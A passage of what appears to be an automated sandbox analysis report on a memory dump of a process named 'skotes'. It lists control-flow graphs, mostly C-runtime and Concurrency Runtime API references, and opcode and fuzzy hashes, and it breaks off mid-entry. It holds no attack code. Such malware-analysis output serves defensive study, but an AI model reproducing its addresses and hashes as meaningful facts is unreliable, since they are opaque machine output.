                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorH_prolog3LastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
                    • String ID:
                    • API String ID: 1224710184-0
                    • Opcode ID: cff4f1584c67b4dd39a057eedf59500e630592c2a8e2e850217cf0530dd3835e
                    • Instruction ID: 32d49e3f13a52536f621e6176fe19dce34cd7db79268dd18cc03f97eddd7ca76
                    • Opcode Fuzzy Hash: cff4f1584c67b4dd39a057eedf59500e630592c2a8e2e850217cf0530dd3835e
                    • Instruction Fuzzy Hash: DC815FB0A51B16BFDB18DF74C884BD9FBA8BF09704F50421AE42897280DBB5A564CFD1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 455 2192a99-2192aa6 456 2192aa8 455->456 457 2192ab2-2192aba 455->457 458 2192aa8 call 2193d93 456->458 459 2192acc-2192ad2 457->459 460 2192abc-2192ac6 call 2190a8d 457->460 461 2192aad 458->461 463 2192ad8-2192b06 call 21925c3 459->463 464 2192bec-2192bef 459->464 460->459 461->457 476 2192b0c-2192b10 463->476 477 2192bce-2192bd7 463->477 465 2192cbb-2192ccf 464->465 466 2192bf5-2192c2d call 21925c3 464->466 469 2192cd9-2192cf0 call 2190a8d call 21922ff 465->469 470 2192cd1-2192cd7 465->470 485 2192c2f-2192c34 466->485 486 2192c8e-2192c97 466->486 473 2192cf2-2192cf6 469->473 470->473 483 2192cf8-2192cfe 473->483 484 2192d00-2192d08 473->484 478 2192b97-2192ba7 call 2190a54 476->478 479 2192b16-2192b19 476->479 480 2192bd9 477->480 481 2192bdb-2192be7 477->481 517 2192ba9-2192baf 478->517 518 2192bb1-2192bbc 478->518 487 2192b1b-2192b1f 479->487 488 2192b76-2192b95 call 2190a54 479->488 480->481 489 2192ca9-2192cb2 481->489 483->483 483->484 493 2192d12-2192d1a 484->493 491 2192c66-2192c73 call 2190a29 485->491 492 2192c36-2192c39 485->492 494 2192c99 486->494 495 2192c9b-2192ca3 486->495 497 2192bbf 487->497 498 2192b25-2192b38 487->498 508 2192bc2-2192bc8 488->508 489->493 507 2192cb4-2192cb9 call 2190bb2 489->507 523 2192c7d-2192c83 491->523 524 2192c75-2192c7b 491->524 502 2192c3b-2192c3f 492->502 503 2192c55-2192c61 call 2190a29 492->503 504 2192d1c-2192d1e call 21908d4 493->504 505 2192d23-2192d2d 493->505 494->495 495->489 497->508 510 2192b3a-2192b64 call 2190a54 498->510 511 2192b6c-2192b74 498->511 514 2192c41-2192c4d call 2190a29 502->514 515 2192c86-2192c8c 502->515 503->515 526 2192c63-2192c64 503->526 504->505 507->493 508->476 508->477 529 2192b66-2192b69 510->529 511->497 514->515 530 2192c4f-2192c53 514->530 515->485 515->486 517->517 517->518 518->497 523->515 524->523 524->524 526->515 529->511 530->515
                    APIs
                    • Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 02192AA8
                      • Part of subcall function 02193D93: GetVersionExW.KERNEL32(?), ref: 02193DB7
                      • Part of subcall function 02193D93: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 02193E56
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 02192ABC
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 02192ADD
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02192B46
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02192B7A
                      • Part of subcall function 02190A54: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 02190A74
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 02192BFA
                      • Part of subcall function 021925C3: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 021925D7
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02192C42
                      • Part of subcall function 02190A29: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02190A45
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02192C56
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02192C67
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02192CB4
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 02192CD9
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 02192CE5
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
                    • String ID:
                    • API String ID: 4140532746-0
                    • Opcode ID: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
                    • Instruction ID: 175847d65686c7decdbaed4afeeb2de1a2909e6acc3ab4504419028f8fd363df
                    • Opcode Fuzzy Hash: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
                    • Instruction Fuzzy Hash: 4981B271A8051AAFCF28DFA8D8A06BDB7F2BF48714B24403DD842A7340E771A940CB95

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 531 21a550c-21a5535 call 21a6466 534 21a553b-21a553e 531->534 535 21a58bc-21a58c1 call 21a8e53 531->535 534->535 536 21a5544-21a554d 534->536 538 21a564f 536->538 539 21a5553-21a5557 536->539 542 21a5651-21a5657 538->542 539->538 541 21a555d-21a5564 539->541 543 21a557c-21a5581 541->543 544 21a5566-21a556d 541->544 545 21a565f-21a566b 542->545 543->542 547 21a5587-21a558f call 21a5190 543->547 544->543 546 21a556f-21a5576 544->546 548 21a5822-21a5825 545->548 549 21a5671-21a5675 545->549 546->538 546->543 563 21a5853-21a5857 547->563 564 21a5595-21a55ae call 21a5190 * 2 547->564 551 21a5849-21a5851 call 21a5190 548->551 552 21a5827-21a582b 548->552 549->548 553 21a567b-21a5682 549->553 551->535 551->563 552->535 556 21a5831-21a5846 call 21a58c2 552->556 557 21a569a-21a569d 553->557 558 21a5684-21a568b 553->558 556->551 561 21a57b8-21a57bc 557->561 562 21a56a3-21a56ca call 21a376f 557->562 558->557 559 21a568d-21a5694 558->559 559->548 559->557 567 21a57c8-21a57cc 561->567 568 21a57be-21a57c7 call 21a3bba 561->568 562->561 576 21a56d0-21a56d3 562->576 564->535 584 21a55b4-21a55ba 564->584 567->551 573 21a57ce-21a57da 567->573 568->567 573->551 578 21a57dc-21a57e0 573->578 580 21a56d6-21a56eb 576->580 581 21a57f2-21a57fa 578->581 582 21a57e2-21a57ea 578->582 587 21a579a-21a57ad 580->587 588 21a56f1-21a56f4 580->588 585 21a57fc-21a580f call 21a5190 * 2 581->585 586 21a5811-21a581e call 21a5eef 581->586 582->551 583 21a57ec-21a57f0 582->583 583->551 583->581 589 21a55bc-21a55c0 584->589 590 21a55e6-21a55ee call 21a5190 584->590 615 21a5858 call 21a6f22 585->615 604 21a587d-21a5895 call 21a5190 * 2 586->604 605 21a5820 586->605 587->580 592 21a57b3-21a57b6 587->592 588->587 594 21a56fa-21a5702 588->594 589->590 595 21a55c2-21a55c9 589->595 609 21a5659-21a565c 590->609 610 21a55f0-21a5610 call 21a5190 * 2 call 21a5eef 590->610 592->561 594->587 599 21a5708-21a571c 594->599 600 21a55cb-21a55d2 595->600 601 21a55dd-21a55e0 595->601 606 21a571f-21a572f 599->606 600->601 607 21a55d4-21a55db 600->607 601->535 601->590 629 21a589a-21a58b7 call 21a3953 call 21a5def call 21a5f89 call 21a5d6b 604->629 630 21a5897 604->630 605->551 611 21a5731-21a5744 call 21a59f8 606->611 612 21a5757-21a5764 606->612 607->590 607->601 609->545 610->609 642 21a5612-21a5617 610->642 627 21a5768-21a5794 call 21a548c 611->627 628 21a5746-21a574c 611->628 612->606 614 21a5766 612->614 619 21a5797 614->619 625 21a585d-21a5878 call 21a3bba call 218af1d call 21a3d6b 615->625 619->587 625->604 627->619 628->611 634 21a574e-21a5754 628->634 629->535 630->629 634->612 642->615 645 21a561d-21a561f 642->645 648 21a5622-21a5635 call 21a5b88 645->648 648->625 654 21a563b-21a5647 648->654 654->615 655 21a564d 654->655 655->648
                    APIs
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 021A5607
                    • type_info::operator==.LIBVCRUNTIME ref: 021A562E
                    • ___TypeMatch.LIBVCRUNTIME ref: 021A573A
                    • CatchIt.LIBVCRUNTIME ref: 021A578F
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 021A5815
                    • _UnwindNestedFrames.LIBCMT ref: 021A589C
                    • CallUnexpected.LIBVCRUNTIME ref: 021A58B7
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 4234981820-393685449
                    • Opcode ID: ad1611b132c96cd88c093627677e3344dfa0a654fa7a6ed2c70fbeb10c1165a9
                    • Instruction ID: f1045bcce84369f897887338a4d4a0b05ae8f01a16bfa19d803879efe54aae7b
                    • Opcode Fuzzy Hash: ad1611b132c96cd88c093627677e3344dfa0a654fa7a6ed2c70fbeb10c1165a9
                    • Instruction Fuzzy Hash: C1C16979C88209FFCF25DFA5C8A0AAEBBB7AF04314F84446AE815AB201D731D551CF91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 656 21a2bd7-21a2bf0 call 21a2748 659 21a2bf9-21a2c1e call 2190067 call 21a270f call 21a22c8 656->659 660 21a2bf2-21a2bf4 656->660 668 21a2c8b-21a2c97 659->668 669 21a2c20-21a2c2a 659->669 661 21a2e31-21a2e34 660->661 672 21a2c9d-21a2ca1 668->672 673 21a2df5-21a2e2d call 21a350e call 219d226 668->673 670 21a2c2c 669->670 671 21a2c85-21a2c87 669->671 674 21a2c65-21a2c6c call 2196069 670->674 671->668 676 21a2ca3-21a2caa call 219c7ed 672->676 677 21a2cb6 672->677 694 21a2e30 673->694 686 21a2c2e-21a2c31 674->686 687 21a2c6e 674->687 676->677 691 21a2cac-21a2caf 676->691 679 21a2cb8-21a2cbb 677->679 683 21a2cbf-21a2cc2 679->683 688 21a2cc8-21a2ce0 683->688 689 21a2df1-21a2df3 683->689 695 21a2c4d-21a2c51 686->695 696 21a2c33-21a2c49 call 21a27f1 686->696 687->671 692 21a2de8-21a2deb 688->692 693 21a2ce6-21a2cec 688->693 689->673 689->694 691->677 697 21a2cb1-21a2cb4 691->697 692->683 692->689 698 21a2cef-21a2cf1 693->698 694->661 700 21a2c62 695->700 701 21a2c53-21a2c60 call 21a3697 695->701 707 21a2c4b 696->707 708 21a2c81 696->708 697->679 702 21a2cf3-21a2d14 call 21a3041 698->702 703 21a2d20-21a2d24 698->703 700->674 701->700 716 21a2c70-21a2c7e call 21a21ca 701->716 720 21a2d1a-21a2d1d 702->720 721 21a2dde-21a2de3 702->721 709 21a2d4c-21a2d55 703->709 710 21a2d26-21a2d46 call 21a2e37 703->710 707->700 708->671 714 21a2d79-21a2d7b 709->714 715 21a2d57-21a2d74 call 21a2f33 709->715 710->709 710->721 717 21a2d99-21a2d9d 714->717 718 21a2d7d-21a2d80 714->718 715->721 729 21a2d76 715->729 716->708 727 21a2d9f-21a2da1 717->727 728 21a2db3-21a2dd1 call 21960da 717->728 718->717 725 21a2d82-21a2d94 call 21a3628 718->725 720->703 721->692 725->721 738 21a2d96 725->738 727->728 731 21a2da3-21a2db1 call 21a22fe 727->731 736 21a2dd3-21a2dd9 728->736 737 21a2de5 728->737 729->714 731->721 731->728 736->698 737->692 738->717
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 021A2BE9
                      • Part of subcall function 021A2748: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021A276B
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 021A2C0A
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 021A2C17
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 021A2C65
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 021A2D0D
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 021A2D3F
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                    • String ID:
                    • API String ID: 1256429809-0
                    • Opcode ID: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
                    • Instruction ID: a49a34fedf55764f6009c457bf318bcf22076448055162647d4f484b63ab6c5f
                    • Opcode Fuzzy Hash: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
                    • Instruction Fuzzy Hash: D371F278940209AFDF16DF58CDA0BFEBBB6AF49304F044099EC11AB252C732D916DB61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 740 219ec90-219ecae call 21958d2 743 219ed2d-219ed3a call 2198055 740->743 744 219ecb0-219eceb call 2199196 740->744 748 219ed49-219ed67 call 21a3d6b 743->748 758 219eced-219ed1c call 219e8b1 call 2198020 744->758 759 219ed25-219ed29 744->759 754 219ed69-219ed89 call 219cc09 call 219c8d2 748->754 755 219ed8f-219ed96 748->755 754->755 756 219ed98 755->756 757 219edd1-219ede8 755->757 763 219ed9a-219edbc call 219cc4d call 219c93a 756->763 764 219edc1-219edc8 756->764 786 219ee4f-219ee52 757->786 767 219ed20-219ed24 758->767 761 219ed2b 759->761 762 219ed3c-219ed44 call 2198066 759->762 761->767 762->748 763->786 770 219edea-219edf4 call 2197f74 764->770 771 219edca-219edcb 764->771 784 219ee07-219ee15 call 219c8f7 770->784 771->757 790 219ee17-219ee2f call 2197f74 784->790 791 219edf6-219ee03 784->791 795 219ee48 790->795 796 219ee31-219ee43 call 219cbc9 790->796 791->784 795->786 796->795
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0219ECE0
                      • Part of subcall function 02199196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 021991B7
                    • Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 0219ECF9
                    • Concurrency::location::_Assign.LIBCMT ref: 0219ED0F
                    • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0219ED7C
                    • Concurrency::details::SchedulerBase::ClearQuickCacheSlot.LIBCMT ref: 0219ED84
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0219EDAB
                    • Concurrency::details::VirtualProcessor::EnsureAllTasksVisible.LIBCONCRT ref: 0219EDB7
                    • Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 0219EDEF
                    • Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0219EE0E
                    • Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 0219EE1C
                    • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedClear.LIBCONCRT ref: 0219EE43
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$ContextVirtual$Processor::QuickScheduler$ClearCountedEventIdleInterlockedProcessorReferenceSet::$AssignAvailableBlockedCacheConcurrency::location::_DeactivateEnsureInternalMakeSlotSpinTasksThrowTraceUntilVisible
                    • String ID:
                    • API String ID: 3608406545-0
                    • Opcode ID: a39cb41113445c8b37c8e93bd00c54bcce78915a73e61bcd78f9524f0075e564
                    • Instruction ID: 4d8c913e4a782403fc4ee506a3ab587887a54382bd4021c24afd1d7195d59cc6
                    • Opcode Fuzzy Hash: a39cb41113445c8b37c8e93bd00c54bcce78915a73e61bcd78f9524f0075e564
                    • Instruction Fuzzy Hash: 995190747402049FDF04EF28C494BAD77A6BF49311F1941BAED4A9B386CB71A801CFA2
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 02196C86
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 02196CB8
                    • List.LIBCONCRT ref: 02196CF3
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 02196D04
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 02196D20
                    • List.LIBCONCRT ref: 02196D5B
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 02196D6C
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 02196D87
                    • List.LIBCONCRT ref: 02196DC2
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 02196DCF
                      • Part of subcall function 02196146: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 0219615E
                      • Part of subcall function 02196146: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 02196170
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 3403738998-0
                    • Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction ID: 205330c49025fbba261c12efd00e3200378317783174e99e7d97528b5a153079
                    • Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction Fuzzy Hash: D3515E71A40209AFDF18DF65C994BEDB3B9FF08344F4540A9E955AB281DB34AE44CFA0
                    APIs
                    • _free.LIBCMT ref: 021AA7D6
                      • Part of subcall function 021AB05C: HeapFree.KERNEL32(00000000,00000000,?,021AF334,?,00000000,?,?,?,021AF35B,?,00000007,?,?,021AF75D,?), ref: 021AB072
                      • Part of subcall function 021AB05C: GetLastError.KERNEL32(?,?,021AF334,?,00000000,?,?,?,021AF35B,?,00000007,?,?,021AF75D,?,?), ref: 021AB084
                    • _free.LIBCMT ref: 021AA7E2
                    • _free.LIBCMT ref: 021AA7ED
                    • _free.LIBCMT ref: 021AA7F8
                    • _free.LIBCMT ref: 021AA803
                    • _free.LIBCMT ref: 021AA80E
                    • _free.LIBCMT ref: 021AA819
                    • _free.LIBCMT ref: 021AA824
                    • _free.LIBCMT ref: 021AA82F
                    • _free.LIBCMT ref: 021AA83D
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
                    • Instruction ID: 666d549668a5bcacbda35cd00b581eec64d44b9158d92c755cef2d5f78829bb0
                    • Opcode Fuzzy Hash: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
                    • Instruction Fuzzy Hash: 2A21B87A944108EFCB11EFA4C991DDE7BB9BF18344F018166A6299B521DB32EB44CF84
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f581972419559139547d94a09d48a4cf01951f6f19e23db2bc11059fe6a6d649
                    • Instruction ID: 04b0744ec018d02baa663f9f08f44b408a37902ee4848edb7dc24614fb49e619
                    • Opcode Fuzzy Hash: f581972419559139547d94a09d48a4cf01951f6f19e23db2bc11059fe6a6d649
                    • Instruction Fuzzy Hash: 9FC123B4E84249AFDB26CFA8D890BEDBBB7BF49300F454068E415AB391D7709941CF61
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                    • String ID:
                    • API String ID: 3943753294-0
                    • Opcode ID: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
                    • Instruction ID: cabbc9ad4bd52c258f4fb5688108d69c9e51acd0aa2e34f926051788cc77f2de
                    • Opcode Fuzzy Hash: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
                    • Instruction Fuzzy Hash: 86515D35980206CFCF18EF64D9C49A977B5FF08315B1540AAE806AB261DB30E981CFA5
                    APIs
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 02197B6A
                      • Part of subcall function 02195F1F: __EH_prolog3_catch.LIBCMT ref: 02195F26
                      • Part of subcall function 02195F1F: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 02195F5F
                    • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 02197B78
                      • Part of subcall function 02196B84: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 02196BA9
                      • Part of subcall function 02196B84: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 02196BCC
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 02197B91
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 02197B9D
                      • Part of subcall function 02195F1F: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02195FA8
                      • Part of subcall function 02195F1F: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 02195FD7
                      • Part of subcall function 02195F1F: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 02195FE5
                    • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 02197BE9
                    • Concurrency::location::_Assign.LIBCMT ref: 02197C0A
                    • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 02197C12
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 02197C24
                    • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 02197C54
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                    • String ID:
                    • API String ID: 2678502038-0
                    • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                    • Instruction ID: f8e7ed72c4c944840f473cddcd0c505e7f687a439ccd8c6eb98a632952ef38ee
                    • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                    • Instruction Fuzzy Hash: A3313970B9425A6FDF26AB7844817FEF7B65F41304F0400A9C856E72C1DB255947CBE1
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 021A0C02
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,02195F15,?), ref: 021A0C14
                    • GetCurrentThread.KERNEL32 ref: 021A0C1C
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,02195F15,?), ref: 021A0C24
                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,02195F15,?), ref: 021A0C3D
                    • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 021A0C5E
                      • Part of subcall function 02190478: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02190492
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,02195F15,?), ref: 021A0C70
                    • GetLastError.KERNEL32(?,?,?,?,?,02195F15,?), ref: 021A0C9B
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021A0CB1
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
                    • String ID:
                    • API String ID: 1293880212-0
                    • Opcode ID: ca3b420515bcbb23f0314330c0ebaf985fd69accfaa50322e501786fcfee08c6
                    • Instruction ID: 5c23d02524ef8aefeeba8cdb5796c4176febcfb0786107e22b4ea5b26f7e70aa
                    • Opcode Fuzzy Hash: ca3b420515bcbb23f0314330c0ebaf985fd69accfaa50322e501786fcfee08c6
                    • Instruction Fuzzy Hash: E41103BDA80305AFDB10AB749D69F9E3BACAF09741F0800B5FD46DA152EB74C5048B76
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID: XgE$XgE
                    • API String ID: 597776487-1765908331
                    • Opcode ID: 1b696d6c4c17f14bd2cd532e520e2bf73148f9a8717794c16fbf28e545bba7b4
                    • Instruction ID: 4d0a44a99f458460774154ba815ae67ef116ac495fb114209ee99381f2f4a682
                    • Opcode Fuzzy Hash: 1b696d6c4c17f14bd2cd532e520e2bf73148f9a8717794c16fbf28e545bba7b4
                    • Instruction Fuzzy Hash: 11C15B75980245AFDB26AF78CC50BEE7BFAEF4A314F1501A9DC54DB290E7308A09CB50
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d2c1a298e8fecfe48cef90fb9b18945fd86a062cf10d1e3a8c03b853429e7ba7
                    • Instruction ID: 8be8d583b4957550c383fb13694dba212a04af7a1e4374fbed8762f276a34440
                    • Opcode Fuzzy Hash: d2c1a298e8fecfe48cef90fb9b18945fd86a062cf10d1e3a8c03b853429e7ba7
                    • Instruction Fuzzy Hash: A7F1C37094025CAFEB24DF54CC84BDEBBBAEF44304F5042A9E919A72C1DB749A84CF95
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$___from_strstr_to_strchr
                    • String ID:
                    • API String ID: 3409252457-0
                    • Opcode ID: b36ae6f94d372ff64b4da89c0af13a455d4f54d85b457d19ac11513aadbc6f32
                    • Instruction ID: f18f06c5b35e4111a1eec8951b381405dbb47090ad5e9880bf483eca9c9ad546
